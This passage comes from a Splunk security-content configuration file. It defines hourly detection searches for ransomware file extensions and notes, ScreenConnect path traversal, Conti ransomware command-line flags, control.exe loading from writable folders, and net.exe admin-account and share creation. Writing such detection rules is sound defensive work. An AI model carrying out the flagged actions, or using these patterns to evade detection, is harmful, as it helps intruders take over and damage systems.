Ransomware", "LockBit Ransomware", "Rhysida Ransomware"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Common Ransomware Extensions - Rule action.correlationsearch.annotations = {"analytic_story": ["SamSam Ransomware", "Ryuk Ransomware", "Ransomware", "Clop Ransomware", "Prestige Ransomware", "LockBit Ransomware", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 100, "impact": 90, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime count latest(Filesystem.user) as user values(Filesystem.file_path) as file_path from datamodel=Endpoint.Filesystem by Filesystem.file_name Filesystem.dest _time span=1h | `drop_dm_object_name(Filesystem)` | rex field=file_name "(?\.[^\.]+)$" | rex field=file_path "(?([^\\\]*\\\)*).*" | stats min(firstTime) as firstTime max(lastTime) as lastTime latest(user) as user dc(true_file_path) as path_count dc(file_name) as file_count latest(file_name) as file_name latest(true_file_path) as file_path by dest file_extension | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `ransomware_extensions` | where path_count > 1 OR file_count > 20 | `common_ransomware_extensions_filter` [ESCU - Common Ransomware Notes - Rule] action.escu = 0 action.escu.enabled = 1 description = The search looks for files created with names matching those typically used in ransomware notes that tell the victim how to get their data back. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The search looks for files created with names matching those typically used in ransomware notes that tell the victim how to get their data back. action.escu.how_to_implement = You must be ingesting data that records file-system activity from your hosts to populate the Endpoint Filesystem data-model node. This is typically populated via endpoint detection-and-response product, such as Carbon Black, or via other endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report file-system reads and writes. action.escu.known_false_positives = It's possible that a legitimate file could be created with the same name used by ransomware note files. action.escu.creation_date = 2020-11-09 action.escu.modification_date = 2020-11-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Common Ransomware Notes - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["SamSam Ransomware", "Ransomware", "Ryuk Ransomware", "Clop Ransomware", "Chaos Ransomware", "LockBit Ransomware", "Rhysida Ransomware"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Common Ransomware Notes - Rule action.correlationsearch.annotations = {"analytic_story": ["SamSam Ransomware", "Ransomware", "Ryuk Ransomware", "Clop Ransomware", "Chaos Ransomware", "LockBit Ransomware", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 100, "impact": 90, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.user) as user values(Filesystem.dest) as dest values(Filesystem.file_path) as file_path from datamodel=Endpoint.Filesystem by Filesystem.file_name | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `ransomware_notes` | `common_ransomware_notes_filter` [ESCU - ConnectWise ScreenConnect Path Traversal - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects attempts to exploit the ConnectWise ScreenConnect CVE-2024-1708 vulnerability, which allows an attacker to perform path traversal attacks by manipulating the file_path and file_name parameters in the URL. The vulnerability, identified as critical with a CVSS score of 9.8, enables unauthorized users to access sensitive files and directories on the host system, potentially leading to the exfiltration of sensitive data or the execution of arbitrary code. The search query provided looks for file system events that could indicate exploitation attempts. This detection is crucial for identifying and responding to active exploitation of this vulnerability in environments running affected versions of ScreenConnect (23.9.7 and prior). It is recommended to update to version 23.9.8 or above immediately to remediate the issue, as detailed in the ConnectWise security advisory and further analyzed by Huntress researchers. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1190"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic detects attempts to exploit the ConnectWise ScreenConnect CVE-2024-1708 vulnerability, which allows an attacker to perform path traversal attacks by manipulating the file_path and file_name parameters in the URL. The vulnerability, identified as critical with a CVSS score of 9.8, enables unauthorized users to access sensitive files and directories on the host system, potentially leading to the exfiltration of sensitive data or the execution of arbitrary code. The search query provided looks for file system events that could indicate exploitation attempts. This detection is crucial for identifying and responding to active exploitation of this vulnerability in environments running affected versions of ScreenConnect (23.9.7 and prior). It is recommended to update to version 23.9.8 or above immediately to remediate the issue, as detailed in the ConnectWise security advisory and further analyzed by Huntress researchers. action.escu.how_to_implement = This analytic utilizes the Endpoint datamodel Filesystem node to identify path traversal attempts against ScreenConnect. Note that using SACL auditing or other file system monitoring tools may also be used to detect path traversal attempts. Typically the data for this analytic will come from EDR or other properly CIM mapped data sources. action.escu.known_false_positives = False positives are not expected, as the detection is based on the presence of file system events that indicate path traversal attempts. The analytic may be modified to look for any file writes to this path as it is not common for files to write here. action.escu.creation_date = 2024-02-21 action.escu.modification_date = 2024-02-21 action.escu.confidence = high action.escu.full_search_name = ESCU - ConnectWise ScreenConnect Path Traversal - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["ConnectWise ScreenConnect Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = A path traversal attack against ScreenConnect has been detected on $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 100}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - ConnectWise ScreenConnect Path Traversal - Rule action.correlationsearch.annotations = {"analytic_story": ["ConnectWise ScreenConnect Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2024-1708", "CVE-2024-1709"], "impact": 100, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1190"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic detects attempts to exploit the ConnectWise ScreenConnect CVE-2024-1708 vulnerability, which allows an attacker to perform path traversal attacks by manipulating the file_path and file_name parameters in the URL. The vulnerability, identified as critical with a CVSS score of 9.8, enables unauthorized users to access sensitive files and directories on the host system, potentially leading to the exfiltration of sensitive data or the execution of arbitrary code. The search query provided looks for file system events that could indicate exploitation attempts. This detection is crucial for identifying and responding to active exploitation of this vulnerability in environments running affected versions of ScreenConnect (23.9.7 and prior). It is recommended to update to version 23.9.8 or above immediately to remediate the issue, as detailed in the ConnectWise security advisory and further analyzed by Huntress researchers. action.notable.param.rule_title = ConnectWise ScreenConnect Path Traversal action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*\\ScreenConnect\\App_Extensions\\*") Filesystem.file_name IN ("*.aspx","*.ashx") by Filesystem.file_create_time Filesystem.process_id Filesystem.process_guid Filesystem.file_name Filesystem.file_path Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `connectwise_screenconnect_path_traversal_filter` [ESCU - ConnectWise ScreenConnect Path Traversal Windows SACL - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects attempts to exploit the ConnectWise ScreenConnect CVE-2024-1708 vulnerability utilizing Windows SACL EventCode 4663, which allows an attacker to perform path traversal attacks by manipulating the file_path and file_name parameters in the URL. The vulnerability, identified as critical with a CVSS score of 9.8, enables unauthorized users to access sensitive files and directories on the host system, potentially leading to the exfiltration of sensitive data or the execution of arbitrary code. The search query provided looks for file system events that could indicate exploitation attempts. This detection is crucial for identifying and responding to active exploitation of this vulnerability in environments running affected versions of ScreenConnect (23.9.7 and prior). It is recommended to update to version 23.9.8 or above immediately to remediate the issue, as detailed in the ConnectWise security advisory and further analyzed by Huntress researchers. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1190"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic detects attempts to exploit the ConnectWise ScreenConnect CVE-2024-1708 vulnerability utilizing Windows SACL EventCode 4663, which allows an attacker to perform path traversal attacks by manipulating the file_path and file_name parameters in the URL. The vulnerability, identified as critical with a CVSS score of 9.8, enables unauthorized users to access sensitive files and directories on the host system, potentially leading to the exfiltration of sensitive data or the execution of arbitrary code. The search query provided looks for file system events that could indicate exploitation attempts. This detection is crucial for identifying and responding to active exploitation of this vulnerability in environments running affected versions of ScreenConnect (23.9.7 and prior). It is recommended to update to version 23.9.8 or above immediately to remediate the issue, as detailed in the ConnectWise security advisory and further analyzed by Huntress researchers. action.escu.how_to_implement = To implement the following query, enable SACL auditing for the ScreenConnect directory(ies). With this data, the following analytic will work correctly. A GIST is provided in the references to assist with enabling SACL Auditing. action.escu.known_false_positives = False positives should be limited as the analytic is specific to ScreenConnect path traversal attempts. Tune as needed, or restrict to specific hosts if false positives are encountered. action.escu.creation_date = 2024-02-21 action.escu.modification_date = 2024-02-21 action.escu.confidence = high action.escu.full_search_name = ESCU - ConnectWise ScreenConnect Path Traversal Windows SACL - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["ConnectWise ScreenConnect Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = A path traversal attack against ScreenConnect has been detected on $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 100}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - ConnectWise ScreenConnect Path Traversal Windows SACL - Rule action.correlationsearch.annotations = {"analytic_story": ["ConnectWise ScreenConnect Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2024-1708", "CVE-2024-1709"], "impact": 100, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1190"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic detects attempts to exploit the ConnectWise ScreenConnect CVE-2024-1708 vulnerability utilizing Windows SACL EventCode 4663, which allows an attacker to perform path traversal attacks by manipulating the file_path and file_name parameters in the URL. The vulnerability, identified as critical with a CVSS score of 9.8, enables unauthorized users to access sensitive files and directories on the host system, potentially leading to the exfiltration of sensitive data or the execution of arbitrary code. The search query provided looks for file system events that could indicate exploitation attempts. This detection is crucial for identifying and responding to active exploitation of this vulnerability in environments running affected versions of ScreenConnect (23.9.7 and prior). It is recommended to update to version 23.9.8 or above immediately to remediate the issue, as detailed in the ConnectWise security advisory and further analyzed by Huntress researchers. action.notable.param.rule_title = ConnectWise ScreenConnect Path Traversal Windows SACL action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4663 ProcessName=*\\ScreenConnect.Service.exe file_path IN ("*\\ScreenConnect\\App_Extensions\\*") file_name IN ("*.aspx","*.ashx") | stats count min(_time) as firstTime max(_time) as lastTime by ObjectName ObjectType ProcessName AccessMask process_id EventCode Computer Caller_User_Name | rename Computer as dest Caller_User_Name as user ProcessName as process_name | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `connectwise_screenconnect_path_traversal_windows_sacl_filter` [ESCU - Conti Common Exec parameter - Rule] action.escu = 0 action.escu.enabled = 1 description = This search detects the suspicious commandline argument of revil ransomware to encrypt specific or all local drive and network shares of the compromised machine or host. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search detects the suspicious commandline argument of revil ransomware to encrypt specific or all local drive and network shares of the compromised machine or host. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = 3rd party tool may have commandline parameter that can trigger this detection. action.escu.creation_date = 2021-06-02 action.escu.modification_date = 2021-06-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Conti Common Exec parameter - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ executing specific Conti Ransomware related parameters. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 64}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Conti Common Exec parameter - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search detects the suspicious commandline argument of revil ransomware to encrypt specific or all local drive and network shares of the compromised machine or host. action.notable.param.rule_title = Conti Common Exec parameter action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "*-m local*" OR Processes.process = "*-m net*" OR Processes.process = "*-m all*" OR Processes.process = "*-nomutex*" by Processes.process_name Processes.process Processes.parent_process_name Processes.parent_process Processes.dest Processes.user Processes.process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `conti_common_exec_parameter_filter` [ESCU - Control Loading from World Writable Directory - Rule] action.escu = 0 action.escu.enabled = 1 description = The following detection identifies control.exe loading either a .cpl or .inf from a writable directory. This is related to CVE-2021-40444. During triage, review parallel processes, parent and child, for further suspicious behaviors. In addition, capture file modifications and analyze. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.002"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following detection identifies control.exe loading either a .cpl or .inf from a writable directory. This is related to CVE-2021-40444. During triage, review parallel processes, parent and child, for further suspicious behaviors. In addition, capture file modifications and analyze. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives will be present as control.exe does not natively load from writable paths as defined. One may add .cpl or .inf to the command-line if there is any false positives. Tune as needed. action.escu.creation_date = 2021-09-08 action.escu.modification_date = 2021-09-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Control Loading from World Writable Directory - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Microsoft MSHTML Remote Code Execution CVE-2021-40444", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to load a suspicious file from disk. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Control Loading from World Writable Directory - Rule action.correlationsearch.annotations = {"analytic_story": ["Microsoft MSHTML Remote Code Execution CVE-2021-40444", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2021-40444"], "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following detection identifies control.exe loading either a .cpl or .inf from a writable directory. This is related to CVE-2021-40444. During triage, review parallel processes, parent and child, for further suspicious behaviors. In addition, capture file modifications and analyze. action.notable.param.rule_title = Control Loading from World Writable Directory action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=control.exe OR Processes.original_file_name=CONTROL.EXE) AND Processes.process IN ("*\\appdata\\*", "*\\windows\\temp\\*", "*\\programdata\\*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `control_loading_from_world_writable_directory_filter` [ESCU - Create local admin accounts using net exe - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the creation of local administrator accounts using the net.exe command to mitigate the risks associated with unauthorized access and prevent further damage to the environment by responding to potential threats earlier and taking appropriate actions to protect the organization's systems and data. This detection is made by a Splunk query to search for processes with the name net.exe or net1.exe that include the "/add" parameter and have specific keywords related to administrator accounts in their process name. This detection is important because the creation of unauthorized local administrator accounts might indicate that an attacker has successfully created a new administrator account and is trying to gain persistent access to a system or escalate their privileges for data theft, or other malicious activities. False positives might occur since there might be legitimate uses of the net.exe command and the creation of administrator accounts in certain circumstances. You must consider the context of the activity and other indicators of compromise before taking any action. For next steps, review the details of the identified process, including the user, parent process, and parent process name. Examine any relevant on-disk artifacts and look for concurrent processes to determine the source of the attack. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.001", "T1136"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects the creation of local administrator accounts using the net.exe command to mitigate the risks associated with unauthorized access and prevent further damage to the environment by responding to potential threats earlier and taking appropriate actions to protect the organization's systems and data. This detection is made by a Splunk query to search for processes with the name net.exe or net1.exe that include the "/add" parameter and have specific keywords related to administrator accounts in their process name. This detection is important because the creation of unauthorized local administrator accounts might indicate that an attacker has successfully created a new administrator account and is trying to gain persistent access to a system or escalate their privileges for data theft, or other malicious activities. False positives might occur since there might be legitimate uses of the net.exe command and the creation of administrator accounts in certain circumstances. You must consider the context of the activity and other indicators of compromise before taking any action. For next steps, review the details of the identified process, including the user, parent process, and parent process name. Examine any relevant on-disk artifacts and look for concurrent processes to determine the source of the attack. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators often leverage net.exe to create admin accounts. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Create local admin accounts using net exe - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["DHS Report TA18-074A", "Azorult", "CISA AA22-257A", "DarkGate Malware"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to add a user to the local Administrators group. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 30}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Create local admin accounts using net exe - Rule action.correlationsearch.annotations = {"analytic_story": ["DHS Report TA18-074A", "Azorult", "CISA AA22-257A", "DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 60, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.001", "T1136"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the creation of local administrator accounts using the net.exe command to mitigate the risks associated with unauthorized access and prevent further damage to the environment by responding to potential threats earlier and taking appropriate actions to protect the organization's systems and data. This detection is made by a Splunk query to search for processes with the name net.exe or net1.exe that include the "/add" parameter and have specific keywords related to administrator accounts in their process name. This detection is important because the creation of unauthorized local administrator accounts might indicate that an attacker has successfully created a new administrator account and is trying to gain persistent access to a system or escalate their privileges for data theft, or other malicious activities. False positives might occur since there might be legitimate uses of the net.exe command and the creation of administrator accounts in certain circumstances. You must consider the context of the activity and other indicators of compromise before taking any action. For next steps, review the details of the identified process, including the user, parent process, and parent process name. Examine any relevant on-disk artifacts and look for concurrent processes to determine the source of the attack. action.notable.param.rule_title = Create local admin accounts using net exe action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.user) as user values(Processes.parent_process) as parent_process values(parent_process_name) as parent_process_name min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=net.exe OR Processes.process_name=net1.exe) AND Processes.process=*/add* AND (Processes.process=*administrators* OR Processes.process=*administratoren* OR Processes.process=*administrateurs* OR Processes.process=*administrador* OR Processes.process=*amministratori* OR Processes.process=*administratorer*) by Processes.process Processes.process_name Processes.parent_process_name Processes.dest Processes.user| `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `create_local_admin_accounts_using_net_exe_filter` [ESCU - Create or delete windows shares using net exe - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the creation or deletion of hidden shares using the net.exe command for prompt response and mitigation to enhance the overall security posture of the organization and protect against potential data breaches, malware infections, and other damaging outcomes. This detection is made by searching for processes that involve the use of net.exe and filters for actions related to creation or deletion of shares. This detection is important because it suggests that an attacker is attempting to manipulate or exploit the network by creating or deleting hidden shares. The creation or deletion of hidden shares can indicate malicious activity since attackers might use hidden shares to exfiltrate data, distribute malware, or establish persistence within a network. The impact of such an attack can vary, but it often involves unauthorized access to sensitive information, disruption of services, or the introduction of malware. False positives might occur since legitimate actions can also involve the use of net.exe. An extensive triage and investigation is necessary to determine the intent and nature of the detected activity. Next steps include reviewing the details of the process involving the net.exe command, including the user, parent process, and timestamps during the triage. Additionally, capture and inspect any relevant on-disk artifacts and review concurrent processes to identify the source of the attack. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070", "T1070.005"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects the creation or deletion of hidden shares using the net.exe command for prompt response and mitigation to enhance the overall security posture of the organization and protect against potential data breaches, malware infections, and other damaging outcomes. This detection is made by searching for processes that involve the use of net.exe and filters for actions related to creation or deletion of shares. This detection is important because it suggests that an attacker is attempting to manipulate or exploit the network by creating or deleting hidden shares. The creation or deletion of hidden shares can indicate malicious activity since attackers might use hidden shares to exfiltrate data, distribute malware, or establish persistence within a network. The impact of such an attack can vary, but it often involves unauthorized access to sensitive information, disruption of services, or the introduction of malware. False positives might occur since legitimate actions can also involve the use of net.exe. An extensive triage and investigation is necessary to determine the intent and nature of the detected activity. Next steps include reviewing the details of the process involving the net.exe command, including the user, parent process, and timestamps during the triage. Additionally, capture and inspect any relevant on-disk artifacts and review concurrent processes to identify the source of the attack. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators often leverage net.exe to create or delete network shares. You should verify that the activity was intentional and is legitimate. action.escu.creation_date = 2020-09-16 action.escu.modification_date = 2020-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Create or delete windows shares using net exe - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Hidden Cobra Malware", "CISA AA22-277A", "Windows Post-Exploitation", "Prestige Ransomware", "DarkGate Malware"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ enumerating Windows file shares. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 25}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Create or delete windows shares using net exe - Rule action.correlationsearch.annotations = {"analytic_story": ["Hidden Cobra Malware", "CISA AA22-277A", "Windows Post-Exploitation", "Prestige Ransomware", "DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070", "T1070.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the creation or deletion of hidden shares using the net.exe command for prompt response and mitigation to enhance the overall security posture of the organization and protect against potential data breaches, malware infections, and other damaging outcomes. This detection is made by searching for processes that involve the use of net.exe and filters for actions related to creation or deletion of shares. This detection is important because it suggests that an attacker is attempting to manipulate or exploit the network by creating or deleting hidden shares. The creation or deletion of hidden shares can indicate malicious activity since attackers might use hidden shares to exfiltrate data, distribute malware, or establish persistence within a network. The impact of such an attack can vary, but it often involves unauthorized access to sensitive information, disruption of services, or the introduction of malware. False positives might occur since legitimate actions can also involve the use of net.exe. An extensive triage and investigation is necessary to determine the intent 